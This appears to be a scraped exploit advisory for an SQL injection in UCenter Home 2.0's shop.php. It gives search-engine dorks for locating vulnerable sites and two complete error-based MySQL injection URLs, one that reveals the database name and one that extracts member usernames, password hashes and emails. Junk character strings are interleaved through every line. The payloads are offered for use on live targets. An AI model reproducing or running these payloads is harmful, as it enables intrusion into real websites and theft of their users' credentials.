& L4 D' u1 o/ l2 \. O& L
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 6 U' n5 R/ v/ N( j8 j" D
m+ F. a8 D1 w4 f; l( h
/ Q, G( s& G* \4 B
8 \& a- y' |: Y% _( v7 r: ?*/ Author : KnocKout
2 i' ~. M F4 D6 F6 M& _9 b
" E+ [0 M0 F$ y% l/ V*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
' C8 d% a4 X( W, L& Y% D
' ` a- D% C1 F* Y! \- r*/ Contact: knockoutr@msn.com 0 I. l, d6 Y: U! D
7 P. R9 c3 j) {/ i6 c4 X9 A4 |
*/ Cyber-Warrior.org/CWKnocKout . Z. u6 u; g2 A) v! d1 I
9 J! L N) ^+ M3 C% f6 `
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- t7 i# A6 G U8 t4 W+ J$ }( I! P" E- U5 G) h: E
Script : UCenter Home 9 l/ G1 P0 _% _2 f) t. o/ b# S
1 N) l) q& j- D$ R3 J y/ H: ?
Version : 2.0 8 j8 R+ W8 A( A" i2 Y$ H9 M
2 N: q+ B) X. eScript HomePage : http://u.discuz.net/ 2 G+ a( w+ G3 v" I3 d' Y% T6 w
1 {4 K1 g$ j3 @* m6 w; k2 t- ?
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
C. V- `+ X% {8 G
9 _7 b; B0 r9 C3 [0 ODork : Powered by UCenter inurl:shop.php?ac=view
; Q- g9 a2 m/ H& h$ u) d; i6 q
2 b! G" b5 {. G/ y! rDork 2 : inurl:shop.php?ac=view&shopid= " ^6 X- l; O% o# D
1 i) k9 V- x0 N8 Q6 G$ Y, l$ S
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 1 d E" C. R; F6 i' G' g
# A! j! \9 a3 q+ V. E/ r4 v
Vuln file : Shop.php 3 ~. [2 k) r& h% Q# D
. L! f, X: Y4 K6 v
value's : (?)ac=view&shopid=
: _4 l, d% }8 n0 ~+ j' m, c9 ?
& M4 E. |$ q! a; OVulnerable Style : SQL Injection (MySQL Error Based)
4 e" F$ j; N7 S7 |* l, m! Y/ c. x
Need Metarials : Hex Conversion 5 g- N9 B% G/ O8 P' g2 N- F# L5 x
7 a1 i# |; o# X- J: u M, X d% P; Z k
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
# f) R- x! @& l0 |+ q, H/ f( K6 |
8 U- u6 ]* X" n; s4 f! I9 U, MYour Need victim Database name.
3 f6 A; g$ T) H
1 F: U" ^0 q4 T) S! s- V+ gfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
9 d3 N7 E z+ {/ G, n$ \+ X9 |$ [5 ~+ U' l
.. ' y$ i: r& G: P8 \
5 [; m7 Q2 ^8 d+ ^7 v% o% SDB : Okey.
$ o% `, f, }5 p8 {, q% J o6 T+ I4 O8 g- a
your edit DB `[TARGET DB NAME]`
0 l! m# w( X9 g! x/ ]. j; r/ Y9 {- X! Y
Example : 'hiwir1_ucenter' * M) S, y1 \0 p3 k! i
0 Y9 Y( r3 [$ E! zEdit : Okey. 3 m; n m' J y% Z3 W; z
9 W: ?6 o5 A$ i
Your use Hex conversion. And edit Your SQL Injection Exploit..
' b/ H* q2 O. L
( |' o3 z1 P2 B5 z1 v0 u+ k 1 N5 X }5 [$ h- A" I( C+ h
9 r A; j4 x% p
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
) V a" v6 T3 m# _2 O& B |